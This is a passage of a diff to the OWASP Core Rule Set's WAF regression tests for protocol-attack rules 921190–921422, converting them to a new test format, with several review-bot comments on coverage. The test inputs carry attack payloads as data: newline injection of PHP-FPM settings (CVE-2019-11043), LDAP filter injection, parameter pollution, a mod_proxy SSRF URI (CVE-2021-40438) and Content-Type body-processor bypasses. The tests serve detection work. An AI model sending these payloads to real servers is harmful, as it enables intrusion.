Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0abar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] + - test_id: 3 desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP%0Ainfo.php?QQQ" - version: "HTTP/1.1" 
- output: - log_contains: id "921190" - - test_title: 921190-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP%0Ainfo.php?QQQ" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] + - test_id: 4 desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" - version: "HTTP/1.1" - output: - log_contains: id "921190" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index 13b3dc180..dc397acbf 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml 
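Review bot: The rewritten 921190 suite still has no negative stage, so nothing would catch this rule starting to fire on ordinary request paths after a later regex change; the same one-directional coverage is visible in the 921220, 921230 and 921240 hunks below, each of which only carries `expect_ids` stages. A stage with `uri: "/foobar"` and `log: no_expect_ids: [921190]` would close that gap here in three lines. Tests 1 and 2 differ only in the case of the percent-encoding (`%0A` versus `%0a`), which the descriptions `(1)` and `(2)` do not say; `desc: "New line char in request filename (lower-case %0a)"` for test 2 would make the pair self-explanatory.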
@@ -2,176 +2,175 @@ meta: author: "Christian Folini, azurit" description: "LDAP injection" - enabled: true - name: 921200.yaml +rule_id: 921200 tests: - - test_title: 921200-1 + - test_id: 1 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921200] + - test_id: 2 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921200] + - test_id: 3 desc: 
"Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921200] + - test_id: 4 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=bar)(%26)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-5 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=bar)(%26)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 5 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=printer)(uid=*)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-6 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=printer)(uid=*)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 6 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=void)(objectClass=users))(%26(objectClass=void)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-7 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=void)(objectClass=users))(%26(objectClass=void)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 7 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=eb9adbd87d)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-8 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=eb9adbd87d)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 8 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-9 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 9 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)(uid=*))(|(uid=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-10 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)(uid=*))(|(uid=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 10 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=aaa*aaa)(cn>=bob)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=aaa*aaa)(cn>=bob)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml index 78b250c06..d338384ff 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml 
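Review bot: Every stage in this hunk POSTs its LDAP-filter payload in `data` without a `Content-Type` header, so whether the body is parsed into the rule's targets depends on what go-ftw sends by default (I believe it adds `application/x-www-form-urlencoded` when `data` is set, but that is not visible here). If it does not, the three `no_expect_ids` stages pass vacuously and the positive stages 4–10 fail for a reason unrelated to the rule; adding `Content-Type: application/x-www-form-urlencoded` under `headers:` in each stage removes the dependency. Separately, the `desc` values are the same two sentences for all ten tests; with `test_title` gone, the description is the only place that says what a payload exercises, so something like `desc: "FP: objectSID filter with dashes should not trigger"` per stage would help whoever triages a failure.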
@@ -2,51 +2,50 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921210.yaml +rule_id: 921210 tests: - - test_title: 921210-1 + - test_id: 1 desc: "HTTP Parameter Pollution via bogus chars after parameter array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a=bar&foo[1]b=" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a=bar&foo[1]b=" + version: "HTTP/1.1" + output: + log: + expect_ids: [921210] + - test_id: 2 desc: "HTTP Parameter Pollution via bogus chars between square brackets of multi-dimensional array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a[2]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a[2]=bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921210] + - test_id: 3 desc: "HTTP Parameter Pollution false positive test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1][2]=bar" - version: "HTTP/1.1" - output: - no_log_contains: id "921210" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1][2]=bar" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921210] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml index 6f260a6b0..a255b5a10 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml @@ -2,22 +2,21 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921220.yaml +rule_id: 921220 tests: - - test_title: 921220-1 + - test_id: 1 desc: "Potential HTTP Parameter Pollution via parameter array" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get?foo[1]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921220" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get?foo[1]=bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921220] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml index dbe32ad8b..a63c737b7 100644 
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml @@ -2,22 +2,21 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Range Header" - enabled: true - name: 921230.yaml +rule_id: 921230 tests: - - test_title: 921230-1 + - test_id: 1 desc: "Submit HTTP Range Header, forbidden at PL3 by default" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Range: 1-2 - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921230" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Range: 1-2 + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921230] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml index 314f48f32..15915dff1 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml 
@@ -2,36 +2,35 @@ meta: author: "Franziska Bühler, azurit" description: "Rule against CVE-2021-40438" - enabled: true - name: 921240.yaml +rule_id: 921240 tests: - - test_title: 921240-1 + - test_id: 1 desc: "Detect attacks against mod_proxy: CVE-2021-40438" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" - - test_title: 921240-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921240] + - test_id: 2 desc: "Detect attacks against mod_proxy: CVE-2021-40438, URI encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921240] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml index de34bd0f5..060b8d368 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml 
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml 
@@ -2,198 +2,197 @@ meta: author: "studersi, azurit" description: Test whether the recommended rules can be fooled into using the wrong body processor which can result in bypasses - enabled: true - name: 921421.yaml +rule_id: 921421 tests: - - test_title: 921421-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - 
output: - log_contains: id "921421" - - test_title: 921421-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 6 desc: Negative test for 921421-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - 
test_title: 921421-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 7 desc: Negative test for 921421-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 8 desc: Negative test for 921421-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 9 desc: Negative test for 921421-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: 
[921421] + - test_id: 10 desc: Negative test for 921421-5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 11 desc: Negative test for rule 921421-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 12 desc: Negative test for rule 921421-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml index c215da6b9..e5b83d50b 100644 
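Review bot: The `desc` strings in this hunk still point at the retired `test_title` values (`Negative test for 921421-1`) now that tests are addressed by `test_id`, and tests 11 and 12 say `Negative test for rule 921421-6` / `-7` although tests 6 and 7 are themselves negative tests, so a reader cannot tell which positive case they mirror (they look like counterparts of the `text/html` and `multipart/form-data` families, but that is a guess). Rewording to name the test and the content type, e.g. `desc: Negative test for test 1 (plain application/json)`, keeps the cross-reference valid after the renumbering. The file also leaves `dest_addr: 127.0.0.1` and `Host: localhost` unquoted while every sibling file touched by this commit quotes them; both parse as strings, so this is a consistency point only.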
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml 
@@ -2,278 +2,277 @@ meta: author: "studersi, azurit" description: Try to send mime types in different part of Content-Type header - enabled: true - name: 921422.yaml +rule_id: 921422 tests: - - test_title: 921422-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: 